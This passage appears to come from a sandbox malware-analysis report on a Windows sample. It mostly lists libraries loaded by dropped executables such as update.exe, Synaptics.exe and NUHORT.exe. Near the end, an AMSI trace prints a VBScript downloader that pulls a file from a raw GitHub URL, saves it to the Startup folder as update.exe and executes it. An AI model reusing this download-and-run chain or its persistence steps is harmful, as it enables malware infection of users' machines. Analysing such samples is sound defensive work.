                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: acgenral.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: acgenral.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                                Source: VFNCBO.lnk.7.drLNK file: ..\..\..\..\..\Windata\NUHORT.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\4OA6BPo.iniJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

                                Data Obfuscation

                                barindex
                                VBScript performs obfuscated calls to suspicious functions
                                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe", "2");IWshShell3.SpecialFolders("Startup");IHost.Sleep("3000");IServerXMLHTTPRequest2.open("GET", "https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe", "2");IWshShell3.Exec("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe")
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00F630B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,16_2_00F630B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0023020C pushfd ; retf 7_2_00230215
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024C6CC push esi; ret 7_2_0024C6CE
